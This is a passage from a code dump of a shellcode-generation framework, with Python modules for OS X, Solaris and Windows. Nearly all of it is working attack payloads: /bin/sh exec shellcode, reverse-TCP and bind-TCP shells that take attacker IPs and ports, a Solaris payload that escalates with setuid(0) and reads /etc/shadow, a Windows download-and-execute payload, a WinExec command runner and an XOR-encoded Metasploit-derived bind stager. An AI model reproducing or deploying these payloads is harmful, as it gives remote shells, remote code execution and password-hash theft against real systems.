r"\xdf\x0f\x02\x24" 64 | shellcode += r"\x0c\x01\x01\x01" 65 | shellcode += r"\x50\x73\x0f\x24" 66 | shellcode += r"\x25\x20\x10\x02" 67 | shellcode += r"\xff\xff\x05\x28" 68 | shellcode += r"\xdf\x0f\x02\x24" 69 | shellcode += r"\x0c\x01\x01\x01" 70 | shellcode += r"\x50\x73\x0f\x24" 71 | shellcode += r"\x50\x73\x06\x24" 72 | shellcode += r"\xff\xff\xd0\x04" 73 | shellcode += r"\x50\x73\x0f\x24" 74 | shellcode += r"\xff\xff\x06\x28" 75 | shellcode += r"\xdb\xff\x0f\x24" 76 | shellcode += r"\x27\x78\xe0\x01" 77 | shellcode += r"\x21\x20\xef\x03" 78 | shellcode += r"\xf0\xff\xa4\xaf" 79 | shellcode += r"\xf4\xff\xa0\xaf" 80 | shellcode += r"\xf0\xff\xa5\x23" 81 | shellcode += r"\xab\x0f\x02\x24" 82 | shellcode += r"\x0c\x01\x01\x01" 83 | #"/bin/sh"; 84 | shellcode += r"\x2f\x62\x69\x6e\x2f\x73\x68" 85 | return shellcode 86 | 87 | 88 | 89 | -------------------------------------------------------------------------------- /shell/database/OSX64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/OSX64/__init__.py -------------------------------------------------------------------------------- /shell/database/OSX64/bin_sh.py: -------------------------------------------------------------------------------- 1 | #https://packetstormsecurity.com/files/133452/OS-X-x64-bin-sh-Shellcode.html 2 | #Author: Csaba Fitzl, @theevilbit 3 | 4 | 5 | def bin_sh(): 6 | shellcode = r"\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7" 7 | shellcode += r"\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05" 8 | return shellcode 9 | 10 | -------------------------------------------------------------------------------- /shell/database/OSX64/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | #https://packetstormsecurity.com/files/100979/Mac-OS-X-Intel-Reverse-TCP-Shell-Shellcode.html 2 | 3 | 4 | """ 5 | ;osx x64 reverse tcp shellcode (131 bytes) 6 | ;Jacob Hammack 7 | ;jacob.hammack@hammackj.com 8 | ;http://www.hammackj.com 9 | ; 10 | ;props to http://www.thexploit.com/ for the blog posts on x64 osx asm 11 | """ 12 | 13 | 14 | def reverse_tcp( IP,PORT): 15 | shellcode = r"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" 16 | shellcode += r"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" 17 | shellcode += r"\x05\x49\x89\xC4\x49\xBD\x01\x01" 18 | shellcode += PORT 19 | shellcode += IP 20 | shellcode += r"\x41\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" 21 | shellcode += r"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" 22 | shellcode += r"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" 23 | shellcode += r"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" 24 | shellcode += r"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" 25 | shellcode += r"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05" 26 | return shellcode 27 | 28 | """ 29 | ;nasm -f macho reverse_tcp.s -o reverse_tcp.o 30 | ;ld -o reverse_tcp -e start reverse_tcp.o 31 | 32 | BITS 64 33 | 34 | section .text 35 | global start 36 | 37 | start: 38 | mov r8b, 0x02 ; unix class system calls = 2 39 | shl r8, 24 ; shift left 24 to the upper order bits 40 | or r8, 0x61 ; socket is 0x61 41 | mov rax, r8 ; put socket syscall # into rax 42 | 43 | ;Socket 44 | xor rdx, rdx ; zero out rdx 45 | mov rsi, rdx ; AF_NET = 1 46 | inc rsi ; rsi = AF_NET 47 | mov rdi, rsi ; SOCK_STREAM = 2 48 | inc rdi ; rdi = SOCK_STREAM 49 | syscall ; call socket(SOCK_STREAM, AF_NET, 0); 50 | 51 | mov r12, rax ; Save the socket 52 | 53 | ;Sock_addr 54 | mov r13, 0xFFFFFFFF5C110101 ; IP = FFFFFFFF, Port = 5C11(4444) 55 | mov r9b, 0xFF ; The sock_addr_in is + FF from where we need it 56 | sub r13, r9 ; So we sub 0xFF from it to get the correct value and avoid a null 57 | push r13 ; Push it on the stack 58 | mov r13, rsp ; Save the sock_addr_in into r13 59 | 60 | 61 | ;Connect 62 | inc r8 ; Connect = 0x62, so we inc by one from the previous syscall 63 | mov rax, r8 ; move that into rax 64 | mov rdi, r12 ; move the saved socket fd into rdi 65 | mov rsi, r13 ; move the saved sock_addr_in into rsi 66 | add rdx, 0x10 ; add 0x10 to rdx 67 | syscall ; call connect(rdi, rsi, rdx) 68 | 69 | sub r8, 0x8 ; subtract 8 from r8 for the next syscall dup2 0x90 70 | xor rsi, rsi ; zero out rsi 71 | 72 | dup: 73 | mov rax, r8 ; move the syscall for dup2 into rax 74 | mov rdi, r12 ; move the FD for the socket into rdi 75 | syscall ; call dup2(rdi, rsi) 76 | 77 | cmp rsi, 0x2 ; check to see if we are still under 2 78 | inc rsi ; inc rsi 79 | jbe dup ; jmp if less than 2 80 | 81 | sub r8, 0x1F ; setup the exec syscall at 0x3b 82 | mov rax, r8 ; move the syscall into rax 83 | 84 | ;exec 85 | xor rdx, rdx ; zero out rdx 86 | mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex 87 | shr r13, 8 ; shift right to create the null terminator 88 | push r13 ; push to the stack 89 | mov rdi, rsp ; move the command from the stack to rdi 90 | xor rsi, rsi ; zero out rsi 91 | syscall ; call exec(rdi, 0, 0) 92 | """ -------------------------------------------------------------------------------- /shell/database/OSX64/tcp_bind.py: -------------------------------------------------------------------------------- 1 | #https://www.milw00rm.com/exploits/10653 2 | 3 | 4 | """ 5 | OS X x64 - tcp bind shellcode, NULL byte free (144 bytes) 6 | 7 | 8 | 9 | ;OS X x64, TCP bind shellcode (port 4444), NULL byte free, 144 bytes long 10 | ;ASM code 11 | ;compile: 12 | ;nasm -f macho64 bind-shellcode.asm 13 | ;ld -macosx_version_min 10.7.0 -o bindsc bind-shellcode.o 14 | 15 | BITS 64 16 | 17 | global start 18 | 19 | section .text 20 | 21 | ;Argument order: rdi, rsi, rdx, rcx 22 | 23 | 24 | start: 25 | ;socket 26 | xor rdi,rdi ;zero out RSI 27 | mov dil, 0x2 ;AF_INET = 2 28 | xor rsi,rsi ;zero out RSI 29 | mov sil, 0x1 ;SOCK_STREAM = 1 30 | xor rdx, rdx ;protocol = IP = 0 31 | 32 | ;store syscall number on RAX 33 | xor rax,rax ;zero out RAX 34 | mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002 35 | ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000 36 | mov al,0x61 ;move 3b to AL (execve socket#) -> RAX = 0x0000000002000061 37 | mov r12, rax ;save RAX 38 | syscall ;trigger syscall 39 | 40 | ;bind 41 | mov r9, rax ;save socket number 42 | mov rdi, rax ;put return value to RDI int socket 43 | xor rsi, rsi ;zero out RSI 44 | push rsi ;push RSI to the stack 45 | mov esi, 0x5c110201 ;port number 4444 (=0x115c) 46 | sub esi,1 ;make ESI=0x5c110200 47 | push rsi ;push RSI to the stack 48 | mov rsi, rsp ;store address 49 | mov dl,0x10 ;length of socket structure 0x10 50 | add r12b, 0x7 ;RAX = 0x0000000002000068 bind 51 | mov rax, r12 ;restore RAX 52 | syscall 53 | 54 | ;listen 55 | ;RDI already contains the socket number 56 | xor rsi, rsi ;zero out RSI 57 | inc rsi ;backlog = 1 58 | add r12b, 0x2 ;RAX = 0x000000000200006a listen 59 | mov rax, r12 ;restore RAX 60 | syscall 61 | 62 | ;accept 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); } 63 | ;RDI already contains the socket number 64 | xor rsi, rsi ;zero out RSI 65 | ;RDX is already zero 66 | sub r12b, 0x4c ;RAX = 0x000000000200001e accept 67 | mov rax, r12 ;restore RAX 68 | syscall 69 | 70 | ;int dup2(u_int from, u_int to); 71 | mov rdi, rax 72 | xor rsi, rsi 73 | add r12b, 0x3c ;RAX = 0x000000000200005a dup2 74 | mov rax, r12 ;restore RAX 75 | syscall 76 | 77 | /* 78 | $ nasm -f bin bind-shellcode.asm 79 | $ hexdump bind-shellcode 80 | 0000000 48 31 ff 40 b7 02 48 31 f6 40 b6 01 48 31 d2 48 81 | 0000010 31 c0 b0 02 48 c1 c8 28 b0 61 49 89 c4 0f 05 49 82 | 0000020 89 c1 48 89 c7 48 31 f6 56 be 01 02 11 5c 83 ee 83 | 0000030 01 56 48 89 e6 b2 10 41 80 c4 07 4c 89 e0 0f 05 84 | 0000040 48 31 f6 48 ff c6 41 80 c4 02 4c 89 e0 0f 05 48 85 | 0000050 31 f6 41 80 ec 4c 4c 89 e0 0f 05 48 89 c7 48 31 86 | 0000060 f6 41 80 c4 3c 4c 89 e0 0f 05 48 ff c6 4c 89 e0 87 | 0000070 0f 05 48 31 f6 56 48 bf 2f 2f 62 69 6e 2f 73 68 88 | 0000080 57 48 89 e7 48 31 d2 41 80 ec 1f 4c 89 e0 0f 05 89 | 0000090 90 | */ 91 | 92 | """ 93 | 94 | # mov esi, 0x5c110201 ;port number 4444 (=0x115c) 95 | 96 | 97 | def tcp_bind( PORT): 98 | shellcode = r"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" 99 | shellcode += r"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" 100 | shellcode += r"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02" 101 | shellcode += PORT 102 | shellcode += r"\x83\xee" 103 | shellcode += r"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" 104 | shellcode += r"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" 105 | shellcode += r"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" 106 | shellcode += r"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" 107 | shellcode += r"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" 108 | shellcode += r"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05" 109 | return shellcode -------------------------------------------------------------------------------- /shell/database/OSX86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/OSX86/__init__.py -------------------------------------------------------------------------------- /shell/database/OSX86/bin_sh.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-692.php 2 | 3 | """ 4 | /* 5 | Title : OSX/x86 intel - execve(/bin/sh) - 24 bytes 6 | Type : Shellcode 7 | Author : Simon Derouineau - simon.derouineau [AT] ingesup.com 8 | Platform : Mac OSX/Intel. Tested on 10.6.4 Build 10F569 9 | 10 | Informations : This code has to be compiled with gcc -m32 switch on 10.6.0+ 11 | 12 | More informations : x86-64 code is more secured than x86 code on OSX platform : 13 | Canaries are added, Stack and heap are non-executable, etc. 14 | 15 | Also, cat /var/db/dyld/dyld_shared_cache_x86_64.map shows that no memory can be 16 | mapped with WX flags, while it's possible with x86 code ( according to /var/db/dyld/dyld_shared_cache_i386.map). 17 | 18 | The method used here is the easier one, heap is executable in x86 applications, 19 | as described in "The Mac Hacker's Handbook", written by Charlie Miller. 20 | 21 | The trick is to memcopy the shellcode to the heap before executing it. 22 | 23 | */ 24 | """ 25 | 26 | 27 | def bin_sh(): 28 | shellcode = r"\x31\xC0" #// xor eax,eax 29 | shellcode += r"\x50" #// push eax 30 | shellcode += r"\x68\x2F\x2F\x73\x68" #// push dword 31 | shellcode += r"\x68\x2F\x62\x69\x6E" #// push dword 32 | shellcode += r"\x89\xE3" #// mov ebx,esp 33 | shellcode += r"\x50\x50\x53" #// push eax, push eax, push ebx 34 | shellcode += r"\xB0\x3B" #// mov al,0x3b 35 | shellcode += r"\x6A\x2A" #// push byte 0x2a 36 | shellcode += r"\xCD\x80" #// int 0x80 37 | return shellcode 38 | 39 | """ 40 | int main(int argc, char *argv[]){ 41 | void (*f)(); 42 | char *x = malloc(sizeof(shellcode)); 43 | memcpy(x, shellcode, sizeof(shellcode)); 44 | f = (void (*)()) x; 45 | f(); 46 | } 47 | """ 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /shell/database/OSX86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | def reverse_tcp( IP, PORT): 2 | shellcode = r"\x68" 3 | shellcode += IP 4 | shellcode += r"\x68\xff\x02" 5 | shellcode += PORT 6 | shellcode += r"\x89\xe7\x31\xc0" 7 | shellcode += r"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" 8 | shellcode += r"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8" 9 | shellcode += r"\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" 10 | shellcode += r"\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80" 11 | return shellcode 12 | -------------------------------------------------------------------------------- /shell/database/OSX86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | #https://packetstormsecurity.com/files/109627/OS-X-x86-Port-Binding-Shellcode.html 2 | 3 | 4 | def tcp_bind( PORT): 5 | shellcode = r"\x31\xC0" 6 | shellcode += r"\x50" 7 | shellcode += r"\x50" 8 | shellcode += r"\x50" 9 | shellcode += r"\xB0\x7E" 10 | shellcode += r"\xCD\x80" 11 | shellcode += r"\x31\xC0" 12 | shellcode += r"\x50" 13 | shellcode += r"\x50" 14 | shellcode += r"\xB0\x17" 15 | shellcode += r"\xCD\x80" 16 | shellcode += r"\x31\xC0" 17 | shellcode += r"\x50" 18 | shellcode += r"\x68\xFF\x02" 19 | shellcode += PORT 20 | shellcode += r"\x89\xE7" 21 | shellcode += r"\x50" 22 | shellcode += r"\x6A\x01" 23 | shellcode += r"\x6A\x02" 24 | shellcode += r"\x6A\x10" 25 | shellcode += r"\xB0\x61" 26 | shellcode += r"\xCD\x80" 27 | shellcode += r"\x57" 28 | shellcode += r"\x50" 29 | shellcode += r"\x50" 30 | shellcode += r"\x6A\x68" 31 | shellcode += r"\x58" 32 | shellcode += r"\xCD\x80" 33 | shellcode += r"\x89\x47\xEC" 34 | shellcode += r"\xB0\x6A" 35 | shellcode += r"\xCD\x80" 36 | shellcode += r"\xB0\x1E" 37 | shellcode += r"\xCD\x80" 38 | shellcode += r"\x50" 39 | shellcode += r"\x50" 40 | shellcode += r"\x6A\x5A" 41 | shellcode += r"\x58" 42 | shellcode += r"\xCD\x80" 43 | shellcode += r"\xFF\x4F\xE4" 44 | shellcode += r"\x79\xF6" 45 | shellcode += r"\x50" 46 | shellcode += r"\x68\x2F\x2F\x73\x68" 47 | shellcode += r"\x68\x2F\x62\x69\x6E" 48 | shellcode += r"\x89\xE3" 49 | shellcode += r"\x50" 50 | shellcode += r"\x54" 51 | shellcode += r"\x54" 52 | shellcode += r"\x53" 53 | shellcode += r"\x50" 54 | shellcode += r"\xB0\x3B" 55 | shellcode += r"\xCD\x80" 56 | return shellcode 57 | -------------------------------------------------------------------------------- /shell/database/Solarisx86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/Solarisx86/__init__.py -------------------------------------------------------------------------------- /shell/database/Solarisx86/bin_sh.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-613.php 2 | 3 | 4 | def bin_sh(): 5 | shellcode = r"\x31\xc0\x50\x68\x6e\x2f" 6 | shellcode += r"\x73\x68\x68\x2f\x2f\x62" 7 | shellcode += r"\x69\x89\xe3\x50\x53\x89" 8 | shellcode += r"\xe2\x50\x52\x53\xb0\x3b" 9 | shellcode += r"\x50\xcd\x91" 10 | return shellcode 11 | 12 | -------------------------------------------------------------------------------- /shell/database/Solarisx86/read.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-111.php 2 | 3 | """ 4 | /* 5 | ; sm4x 2008 6 | ; /bin/cat /etc/shadow 7 | ; 59 bytes 8 | ; SunOS sol01 5.11 snv_86 i86pc i386 i86pc Solaris 9 | ; (port to SunOS to pwn a b0x - thank god for that default __unix__ CRYPT_DEFAULT!!!!) 10 | ; this is what happens when ur work takes away root pirv on a SunOS box :-/ 11 | 12 | global _start 13 | _start: 14 | 15 | xor eax, eax 16 | 17 | ; --- setuid(0) 18 | push eax 19 | push eax 20 | mov al, 0x17 21 | int 0x91 22 | 23 | ; --- setup /etc/shadow 24 | jmp short load_file 25 | ok: 26 | pop esi 27 | 28 | ; setup /bin/cat 29 | push eax 30 | push 0x7461632f 31 | push 0x6e69622f 32 | mov ebx, esp 33 | 34 | ; --- array setup 35 | push eax ; null 36 | push esi ; /etc/shadow 37 | push ebx ; /bin/cat 38 | mov edx, esp 39 | 40 | ; -- execve() 41 | push eax ; 0 42 | push edx ; array { "/bin/cat", "/etc/shadow", 0} 43 | push ebx ; /bin/cat 44 | mov al, 0x3b 45 | push eax 46 | int 0x91 47 | 48 | ; --- exit 49 | inc eax 50 | push eax 51 | push eax 52 | int 0x91 53 | 54 | load_file: 55 | call ok 56 | db '/etc/shadow' 57 | 58 | */ 59 | """ 60 | def read( shellcode): 61 | code = r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20" 62 | code += r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" 63 | code += r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" 64 | code += r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50" 65 | code += r"\xcd\x91\xe8\xdb\xff\xff\xff" 66 | code += shellcode 67 | return code 68 | -------------------------------------------------------------------------------- /shell/database/Solarisx86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | def reverse_tcp( IP, PORT): 2 | shellcode = r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16" 3 | shellcode += r"\x68" 4 | shellcode += IP 5 | shellcode += r"\x66\x68" 6 | shellcode += PORT 7 | shellcode += r"\x66\x6a\x02\x89\xe7" 8 | shellcode += r"\x6a\x02\x31\xc0\x50\x50\x6a\x02\x6a\x02\xb0\xe6\xff\xd6" 9 | shellcode += r"\x6a\x10\x57\x50\x31\xc0\xb0\xeb\xff\xd6\x5b\x53\x6a\x09" 10 | shellcode += r"\x53\x6a\x3e\x58\xff\xd6\xff\x4f\xe0\x79\xf6\x50\x68\x2f" 11 | shellcode += r"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1" 12 | shellcode += r"\x50\x51\x53\xb0\x3b\xff\xd6" 13 | return shellcode 14 | 15 | -------------------------------------------------------------------------------- /shell/database/Solarisx86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | def tcp_bind( PORT): 2 | shellcode = r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16" 3 | shellcode += r"\x31\xc0\x50\x68\xff\x02" 4 | shellcode += PORT 5 | shellcode += r"\x89\xe7\x6a\x02\x50\x50" 6 | shellcode += r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0" 7 | shellcode += r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea" 8 | shellcode += r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79" 9 | shellcode += r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" 10 | shellcode += r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6" 11 | return shellcode -------------------------------------------------------------------------------- /shell/database/Windows/README.md: -------------------------------------------------------------------------------- 1 | #Windows shellcodes will be work on both x86 / x86_x64 2 | 3 | 4 | 5 | #Test OS's 6 | Windows XP/SP3 -x86 7 | Windows 7 -x64 8 | Windows 8.1 -x64 9 | Windows 10 -x64 10 | -------------------------------------------------------------------------------- /shell/database/Windows/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/Windows/__init__.py -------------------------------------------------------------------------------- /shell/database/Windows/bind_tcp.py: -------------------------------------------------------------------------------- 1 | # Bind TCP Payload - Completely ported from Metasploit Framework 2 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb 3 | 4 | from .xor import * 5 | 6 | 7 | class PayloadModule: 8 | def __init__(self, port): 9 | self.name = "Bind TCP Stager (Stage 1)" 10 | self.description = "Binds to a user provided port and listens for\ 11 | fun files :)" 12 | self.cli_name = "bind_tcp" 13 | self.platform = "Windows" 14 | self.arch = "x86" 15 | self.lport = int(port) 16 | self.port_offset = 197 17 | self.customized_shellcode = '' 18 | self.stager = ( 19 | "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + 20 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + 21 | "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + 22 | "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" + 23 | "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" + 24 | "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" + 25 | "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" + 26 | "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" + 27 | "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" + 28 | "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" + 29 | "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" + 30 | "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" + 31 | "\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" + 32 | "\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" + 33 | "\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" + 34 | "\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" + 35 | "\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" + 36 | "\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" + 37 | "\x29\xC6\x85\xF6\x75\xEC\xC3") 38 | 39 | def gen_shellcode(self): 40 | 41 | port_shellcode_stage = str(hex(self.lport).lstrip('0')) 42 | if len(port_shellcode_stage.lstrip('x')) == 3: 43 | # detect if odd number, is so, need to add a '0' to the front 44 | port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') 45 | port_1half = '\\x' + port_1half 46 | port_2half = port_shellcode_stage[2:4] 47 | port_2half = '\\x' + port_2half 48 | port_shellcode = port_1half + port_2half 49 | elif len(port_shellcode_stage.lstrip('x')) == 4: 50 | port_1half = port_shellcode_stage[1:3] 51 | port_1half = '\\x' + port_1half 52 | port_2half = port_shellcode_stage[3:5] 53 | port_2half = '\\x' + port_2half 54 | port_shellcode = port_1half + port_2half 55 | elif len(port_shellcode_stage.lstrip('x')) == 2: 56 | port_1half = port_shellcode_stage[1:3].lstrip('x') 57 | port_1half = '\\x' + port_1half 58 | port_2half = '00' 59 | port_2half = '\\x' + port_2half 60 | port_shellcode = port_2half + port_1half 61 | elif len(port_shellcode_stage.lstrip('x')) == 1: 62 | port_1half = port_shellcode_stage.lstrip('x') 63 | port_1half = '\\x0' + port_1half 64 | port_2half = '\\x00' 65 | port_shellcode = port_2half + port_1half 66 | 67 | stager_shellcode = self.stager[0:self.port_offset] 68 | stager_shellcode += port_shellcode.decode('string-escape') 69 | stager_shellcode += self.stager[self.port_offset + 2:] 70 | 71 | self.customized_shellcode = "\\x" + '\\x'.join(stager_shellcode.encode('hex')[i:i+2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) 72 | return EncoderModule(self.customized_shellcode).do_the_magic() 73 | 74 | -------------------------------------------------------------------------------- /shell/database/Windows/downloadandexecute.py: -------------------------------------------------------------------------------- 1 | #https://packetstormsecurity.com/files/119812/Allwin-URLDownloadToFile-WinExec-ExitProcess-Shellcode.html 2 | #Author: RubberDuck 3 | 4 | 5 | #WORK 6 | def downANDexecute( URL,FILENAME): 7 | shellcode = r"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B" 8 | shellcode += r"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" 9 | shellcode += r"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72" 10 | shellcode += r"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81" 11 | shellcode += r"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04" 12 | shellcode += r"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" 13 | shellcode += r"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3" 14 | shellcode += r"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3" 15 | shellcode += r"\x8B\x14\x8E\x03\xD3\x33\xC9\x51" 16 | shellcode += FILENAME 17 | shellcode += r"\x53\x52" 18 | shellcode += r"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62" 19 | shellcode += r"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2" 20 | shellcode += r"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C" 21 | shellcode += r"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C" 22 | shellcode += r"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24" 23 | shellcode += r"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33" 24 | shellcode += r"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64" 25 | shellcode += r"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C" 26 | shellcode += r"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24" 27 | shellcode += r"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83" 28 | shellcode += r"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68" 29 | shellcode += r"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57" 30 | shellcode += r"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D" 31 | shellcode += r"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A" 32 | shellcode += r"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03" 33 | shellcode += r"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69" 34 | shellcode += r"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF" 35 | shellcode += r"\xFF\xFF" 36 | shellcode += URL 37 | return shellcode 38 | 39 | 40 | -------------------------------------------------------------------------------- /shell/database/Windows/execc.py: -------------------------------------------------------------------------------- 1 | #Work already test on w7,w8,w10(x86/x86_x64) 2 | import codecs 3 | 4 | def WinExec( command): 5 | from re import findall 6 | fill = "31c9b957696e45eb0431c9eb0031c" 7 | fill += "031db31d231ff31f6648b7b308b7f0" 8 | fill += "c8b7f1c8b47088b77208b3f807e0c3" 9 | fill += "375f289c703783c8b577801c28b7a2" 10 | fill += "001c789dd81f957696e45753b8b34a" 11 | fill += "f01c645390e75f68b7a2401c7668b2" 12 | fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd" 13 | if len(command) == 4: 14 | stack = "%s" % (codecs.encode(command, 'hex')) 15 | data = findall("..?", stack) 16 | fill += "68"+"".join(data) 17 | else: 18 | if len(command)%4 == 3: 19 | padd = "\x20" 20 | elif len(command)%4 == 2: 21 | padd = "\x20"*2 22 | elif len(command)%4 == 1: 23 | padd = "\x20"*3 24 | else: 25 | padd = "" 26 | command = command + padd 27 | fixmesempai = findall('....?', command) 28 | for x in fixmesempai[::-1]: 29 | first = str(codecs.encode(x[::-1].encode('utf-8'), 'hex')) 30 | second = findall("..?", first)[::-1] 31 | fill += "68"+"".join(second) 32 | fill 